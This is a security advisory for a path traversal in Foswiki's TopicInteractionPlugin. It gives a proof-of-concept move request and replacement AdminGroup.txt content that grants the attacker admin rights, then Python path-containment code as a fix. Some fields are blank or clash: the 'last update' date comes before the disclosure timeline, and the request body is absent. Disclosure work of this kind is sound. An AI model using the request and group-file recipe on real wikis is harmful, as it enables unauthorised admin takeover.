usd-2022-0014 | Foswiki 2.1.7 Path Traversal

Advisory ID: usd-2022-0014
Product: Foswiki
Affected Version: 2.1.7
Vulnerability Type:
Security Risk: High
Vendor URL:
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
Advisory Status: Closed
Last Update: 2022-01-22

Description

The TopicInteractionPlugin allows relative path traversal through its filename parameter. The plugin moves attachments to other wiki pages; attachments are stored in the pub/<web>/<topic> directory, while the content of the wiki pages is stored in the data/ directory. Going back three directories allows an attacker to move files outside the pub directory (e.g. the AdminGroup.txt file, which controls the permissions for the backend configuration pages).

Proof of Concept

The following request (re)moves the file AdminGroup.txt of the Main web, which allows an attacker to create a new one afterwards and become an AdminGroup member.

The following request removes the file "AdminGroup.txt":

POST /bin/rest/TopicInteractionPlugin/move HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 129
Origin: http://localhost
Connection: close
Referer: http://localhost/Main/ChrisChris
Cookie: FOSWIKISID=582be25dd6c36a6d45e6a37277378374; FOSWIKISTRIKEONE=21d8825b6b492836f1235aa0293bc310
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin



Afterwards, a user can create a new one containing their username and become an admin.

The following content can be used for a new AdminGroup.txt file.

%META:TOPICINFO{author="BaseUserMapping_999" comment="" date="1648462765" format="1.1" version="1"}%

%INCLUDE{"%USERSWEB%.AdminUser" section="sudo_login"}%

%IF{"(NOT defined GROUP) OR $GROUP = ''" then='
<sticky><div class="foswikiNotification"></sticky>
*How to add the first administrator* %BR%
If you haven\'t previously set up an administrator, follow these steps: (*Note:* This help text will disappear once you have added a user to this group.)
$percntINCLUDE{"%SYSTEMWEB%.InstallationGuide" section="addadmin"}$percnt

More information on Administrators, and on how to use the AdminGroup is found in the [[%SYSTEMWEB%.InstallationGuide#DefineAdminUser][Installation Guide]]

You can edit this topic to add a description to the AdminGroup

%META:PREFERENCE{name="GROUP" title="GROUP" type="Set" value=""}%
%META:PREFERENCE{name="ALLOWTOPICCHANGE" title="ALLOWTOPICCHANGE" type="Set" value="AdminGroup,ChrisChris"}%
%META:PREFERENCE{name="VIEW_TEMPLATE" title="VIEW_TEMPLATE" type="Set" value="GroupView"}%


The "ALLOWTOPICCHANGE" permission contains our username, which allows us to become an admin user.

Fix

Restrict the movement of attachments to the pub directory.
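One way to implement this restriction, as an added example: the check below is written in Python rather than the plugin's Perl, is not the vendor's fix and not part of the advisory, and assumes the pub/<web>/<topic>/<filename> layout the advisory describes. The function names, the word-character rule for web and topic names and the constructed demo tree are all assumptions made for the example.

```python
import re
import tempfile
from pathlib import Path


class AttachmentPathError(ValueError):
    """Raised when a requested attachment location would leave the pub tree."""


# Assumption: web and topic names are restricted to plain word characters.
# Real Foswiki also allows sub-webs ("Main/Sub"), so a production check would
# validate each path segment instead; this keeps the example short.
_NAME_RE = re.compile(r"[A-Za-z0-9_]+")


def resolve_attachment_path(pub_root, web, topic, filename):
    """Return the canonical on-disk path for pub/<web>/<topic>/<filename>,
    or raise AttachmentPathError if the request would escape pub_root.

    Two layers: a syntactic check on each user-controlled component (no
    separators, no '.' or '..'), then a containment check on the fully
    resolved path, so a symlink inside the tree cannot be used to escape
    it either.
    """
    for label, value in (("web", web), ("topic", topic)):
        if not _NAME_RE.fullmatch(value):
            raise AttachmentPathError(f"invalid {label} name: {value!r}")
    if filename in ("", ".", "..") or any(c in filename for c in "/\\\0"):
        raise AttachmentPathError(f"invalid attachment filename: {filename!r}")

    root = Path(pub_root).resolve()
    candidate = (root / web / topic / filename).resolve()
    try:
        candidate.relative_to(root)  # raises ValueError when outside root
    except ValueError:
        raise AttachmentPathError(
            f"attachment path {candidate} is outside {root}") from None
    return candidate


def is_allowed_move(pub_root, src_web, src_topic, dst_web, dst_topic, filename):
    """True only if both the source and the destination of a move stay
    inside the pub tree; the move handler should refuse otherwise."""
    try:
        resolve_attachment_path(pub_root, src_web, src_topic, filename)
        resolve_attachment_path(pub_root, dst_web, dst_topic, filename)
    except AttachmentPathError:
        return False
    return True


if __name__ == "__main__":
    # Constructed demo tree: <tmp>/pub and <tmp>/data, mirroring the layout
    # described in the advisory.
    with tempfile.TemporaryDirectory() as tmp:
        pub = Path(tmp) / "pub"
        (pub / "Main" / "WebHome").mkdir(parents=True)
        (Path(tmp) / "data" / "Main").mkdir(parents=True)
        (Path(tmp) / "data" / "Main" / "AdminGroup.txt").write_text("group file\n")

        # Legitimate move between two topics: accepted.
        print(is_allowed_move(pub, "Main", "WebHome", "Sandbox", "TestTopic", "report.pdf"))
        # Filename climbing three levels into data/: rejected.
        print(is_allowed_move(pub, "Main", "WebHome", "Sandbox", "TestTopic",
                              "../../../data/Main/AdminGroup.txt"))
        # Traversal smuggled through the web name instead: rejected.
        print(is_allowed_move(pub, "Main", "WebHome", "../data", "Main", "AdminGroup.txt"))
```

The second layer matters because filtering ".." alone is not enough: the resolved candidate is compared with the resolved root, so a symlink placed inside pub that points elsewhere is refused as well. The check has to run for both endpoints of a move, since either the source or the destination could otherwise be pointed outside the tree.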


Timeline

  • 2022-01-05: Vulnerability identified by Christian Pöschl
  • 2022-04-27: First contact request made to the vendor
  • 2022-05-05: Second contact request made to the vendor
  • 2022-06-09: Shared vulnerability details with vendor
  • 2022-06-09: Fix released by vendor

Credits

This security vulnerability was found by Christian Pöschl of usd AG.